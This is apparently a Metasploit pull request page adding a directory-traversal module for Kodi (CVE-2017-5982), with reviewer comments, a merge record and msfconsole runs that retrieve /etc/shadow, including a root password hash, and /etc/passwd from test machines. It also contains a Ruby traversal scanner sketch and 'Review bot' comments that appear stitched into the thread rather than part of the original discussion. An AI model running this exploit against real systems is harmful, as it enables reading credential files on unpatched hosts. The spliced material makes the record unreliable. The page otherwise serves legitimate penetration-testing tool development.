
Add a sploit for CVE-2017-5982 #7980

Merged (2 commits), Feb 22, 2017

jvoisin (Contributor) commented Feb 19, 2017

This PR implements a module for CVE-2017-5982 for the kodi mediacenter, loosely based on auxiliary/scanner/http/clansphere_traversal.

Verification

List the steps needed to make sure this thing works

  • Get a working kodi setup. I used libreelec since I'm lazy and it just works™
  • Start msfconsole
  • use auxiliary/scanner/http/kodi_traversal
  • Set RPORT and RHOST
  • run
  • Verify that you get the file you requested

Complete run

msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > info 

       Name: Kodi 17.1 Local File Inclusion Vulnerability
     Module: auxiliary/scanner/http/kodi_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-02-12

Provided by:
  Eric Flokstra
  jvoisin

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      10               yes       The max traversal depth to root directory
  FILE       /etc/shadow      yes       The file to obtain
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.0.31     yes       The target address range or CIDR identifier
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path to the web application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal flaw found in Kodi 17.1.

References:
  https://cvedetails.com/cve/CVE-2017-5982/

msf auxiliary(kodi_traversal) > show options 

Module options (auxiliary/scanner/http/kodi_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILE       /etc/shadow      yes       The file to obtain
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to the web application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(kodi_traversal) > set RPORT 8080
RPORT => 8080
msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
RHOSTS => 192.168.0.31
msf auxiliary(kodi_traversal) > run

[*] Reading '/etc/shadow'
[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219213028_default_192.168.0.31_kodi_812537.bin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf >  cat /home/jvoisin/.msf4/loot/20170219213100_default_192.168.0.31_kodi_464790.bin
[*] exec:  cat /home/jvoisin/.msf4/loot/20170219213100_default_192.168.0.31_kodi_464790.bin

systemd-network:*:::::::
root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.:::::::
nobody:*:::::::
dbus:*:::::::
system:*:::::::
sshd:*:::::::
avahi:*:::::::
msf > 
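As an added example that is not part of this PR or of the Metasploit module, here is a stand-alone Ruby sketch of the scanner logic the verification steps above rely on: walk `../` prefixes up to DEPTH, hand each candidate to a requester, and accept a 200 only when the body actually looks like the requested file, so an error page or an empty response is not logged as success. The Kodi request that triggers the traversal is deliberately not reproduced (the page does not show it); the requester is a lambda, and the fake target, its web root `/srv/www`, the file contents and the root/non-root switch are all constructed for this example.

```ruby
# Added example, not code from the PR or the Metasploit module.
# ASSUMPTIONS: the Kodi request format is not modelled; a requester lambda
# takes a traversal candidate and returns [http_status, body]. The fake
# target below (web root, files, permissions) is constructed for the demo.

# Content checks keyed by requested file. A 200 whose body matches none of
# these is treated as a miss (error page, empty body, wrong file).
FILE_SIGNATURES = {
  '/etc/passwd' => /^[a-z_][a-z0-9_-]*:[^:]*:\d+:\d+:/,     # name:x:uid:gid:
  '/etc/shadow' => /^[a-z_][a-z0-9_-]*:(\$[0-9a-z]+\$|\*|!)/, # name:$hash or locked
}

# Traversal candidates in the order a scanner tries them:
# "../etc/passwd", "../../etc/passwd", ... up to `depth` levels.
def traversal_candidates(file, depth)
  rel = file.sub(%r{\A/+}, '') # strip leading slash
  (1..depth).map { |n| ('../' * n) + rel }
end

# Does the body look like the file we asked for?
def looks_like?(file, body)
  return false if body.nil? || body.strip.empty?
  sig = FILE_SIGNATURES[file]
  return true if sig.nil? # no signature known for this file: accept any non-empty body
  body.lines.any? { |line| line.match?(sig) }
end

# requester: lambda(candidate) -> [status, body].
# Returns {ok: true, path:, depth:, body:} on the first validated hit,
# or {ok: false, last_status:} so the operator sees why it failed.
def fetch_file(file, depth, requester)
  last_status = nil
  traversal_candidates(file, depth).each_with_index do |cand, i|
    status, body = requester.call(cand)
    last_status = status
    next unless status == 200 && looks_like?(file, body)
    return { ok: true, path: cand, depth: i + 1, body: body }
  end
  { ok: false, last_status: last_status }
end

# Constructed fake target: a two-level web root and a tiny filesystem.
# Mirrors the point raised in the thread: /etc/shadow is only readable
# when the service runs as root.
FAKE_WEBROOT = '/srv/www'
FAKE_FS = {
  '/etc/passwd' => "root:x:0:0:Root User:/storage:/bin/sh\nnobody:x:65534:65534:Nobody:/:/bin/sh\n",
  '/etc/shadow' => "root:$6$saltsalt$constructedhash:::::::\nnobody:*:::::::\n",
}

def fake_requester(run_as_root)
  lambda do |cand|
    resolved = File.expand_path(cand, FAKE_WEBROOT) # collapses ../, stops at /
    content = FAKE_FS[resolved]
    return [404, '<html>Not Found</html>'] if content.nil?
    return [403, '<html>Forbidden</html>'] if resolved == '/etc/shadow' && !run_as_root
    [200, content]
  end
end

if __FILE__ == $PROGRAM_NAME
  [false, true].each do |as_root|
    ['/etc/passwd', '/etc/shadow'].each do |f|
      r = fetch_file(f, 10, fake_requester(as_root))
      if r[:ok]
        puts "[+] #{f} (root=#{as_root}) read at depth #{r[:depth]} via #{r[:path]}"
      else
        puts "[-] #{f} (root=#{as_root}) not obtained, last HTTP status #{r[:last_status]}"
      end
    end
  end
end
```

The signature check is what keeps the loot directory honest: a server that returns 200 with an HTML error body for every path would otherwise produce a "stored as" line for each host. Reporting the last status on failure also replaces an "unknown reason" message with something an operator can act on (permission denied versus traversal depth exhausted).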
void-in (Contributor) commented Feb 20, 2017

Is the application running with root privileges? /etc/shadow can only be read by root. /etc/passwd would be a better choice for non root users.

jvoisin (Contributor, Author) commented Feb 20, 2017

It depends on the deployment, but a lot of people are running it on a super-light Linux (like libreelec, openelec, …), with everything running as root.

@@ -0,0 +1,40 @@
## Vulnerable Application

This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.

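Review bot: the affected-version statement in this hunk ("in Kodi 17.1") conflicts with the install note further down the same file ("You'll need a version lower than 17.1") and with the module description the maintainer tested ("Kodi before 17.1"); state the range once and reuse it, e.g. "This module exploits an arbitrary file disclosure vulnerability in Kodi before 17.1."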
h00die (Contributor) commented Feb 20, 2017

This says <= 17.1

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).

You'll need a version lower than 17.1.

h00die (Contributor) commented Feb 20, 2017

This says <17.1. Is 17.1 vuln?

@@ -0,0 +1,40 @@
## Vulnerable Application

This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.

h00die (Contributor) commented Feb 20, 2017

Generally I like to link to a zip or tgz here if possible.


**Vulnerable Application Installation Steps**

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if

h00die (Contributor) commented Feb 20, 2017

I get that libreelec is a kodi image essentially, but it'd be nice to just have a quick thing here. Right now it looks like we're exploiting kodi but then libreelec comes out of left field.

I'd also like to say a libreelec build here that is known vuln for future proofing. In 5 years this line won't change and someone will try a non-vuln version.

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).

You'll need a version lower than 17.1.

h00die (Contributor) commented Feb 20, 2017

Version of libreelec or kodi


## Verification Steps

A successful check of the exploit will look like this:

h00die (Contributor) commented Feb 20, 2017

Change check to run since check is a command; we don't want confusion.

system:*:::::::
sshd:*:::::::
avahi:*:::::::
msf auxiliary(kodi_traversal) > info

h00die (Contributor) commented Feb 20, 2017

Get rid of this line and the next empty one.

register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
OptString.new('FILE', [true, 'The file to obtain', '/etc/shadow']),

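Review bot: the default FILE in this hunk, `OptString.new('FILE', [true, 'The file to obtain', '/etc/shadow'])`, only succeeds when Kodi runs as root, which the thread notes is the LibreELEC/OpenELEC case but not a general one; defaulting to '/etc/passwd' gives a positive result on any install, and the maintainer's test run on this page shows the merged module using that default.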
h00die (Contributor) commented Feb 20, 2017

Per @void-in, if this is typically run as root this line is fine. If not, maybe it should be /etc/passwd, or the file (db) with the logins for kodi.

print_good("#{fname} stored as '#{p}'")

else
print_error("Fail to obtain file for some unknown reason")

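Review bot: the error branch in this hunk, `print_error("Fail to obtain file for some unknown reason")`, gives the operator nothing to act on; fix the grammar ("Failed to obtain file") and include the HTTP status of the last response so a permission failure can be told apart from an exhausted traversal depth. The string has no interpolation, so single quotes are also the right choice here.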
h00die (Contributor) commented Feb 20, 2017

Change " to ' here.

bwatters-r7 self-assigned this Feb 22, 2017

bwatters-r7 merged commit 73eed10 into rapid7:master Feb 22, 2017

1 check passed: continuous-integration/travis-ci/pr (The Travis CI build passed)

bwatters-r7 added a commit that referenced this pull request Feb 22, 2017

bwatters-r7 (Contributor) commented Feb 22, 2017

Testing

Using http://releases.libreelec.tv/LibreELEC-RPi2.arm-7.0.3.img.gz on rpi v2

msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > info

       Name: Kodi 17.0 Local File Inclusion Vulnerability
     Module: auxiliary/scanner/http/kodi_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-02-12

Provided by:
  Eric Flokstra
  jvoisin

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      10               yes       The max traversal depth to root directory
  FILE       /etc/passwd      yes       The file to obtain
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path to the web application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal flaw found in Kodi before 
  17.1.

References:
  https://cvedetails.com/cve/CVE-2017-5982/

msf auxiliary(kodi_traversal) > set rport 8080
rport => 8080
msf auxiliary(kodi_traversal) > set rhosts <Rpi_IP>
rhosts => <Rpi_IP>
msf auxiliary(kodi_traversal) > show options

Module options (auxiliary/scanner/http/kodi_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      10               yes       The max traversal depth to root directory
   FILE       /etc/passwd      yes       The file to obtain
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     <Rpi_IP>         yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to the web application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(kodi_traversal) > run

[*] Reading '/etc/passwd'
[+] /etc/passwd stored as '/home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(kodi_traversal) > cat /home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin
[*] exec: cat /home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin

systemd-network:x:193:193:systemd-network:/:/bin/sh
root:x:0:0:Root User:/storage:/bin/sh
nobody:x:65534:65534:Nobody:/:/bin/sh
dbus:x:81:81:System message bus:/:/bin/sh
system:x:430:430:service:/var/run/connman:/bin/sh
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/bin/sh
avahi:x:495:495:avahi-daemon:/var/run/avahi-daemon:/bin/sh
msf auxiliary(kodi_traversal) > 

bwatters-r7 (Contributor) commented Feb 22, 2017

Release Notes

The Kodi 17.0 Local File Inclusion Vulnerability module has been added to the framework. It takes advantage of a directory traversal vulnerability in the popular Kodi streaming OS/Application suite to allow arbitrary file downloads from an unpatched system.
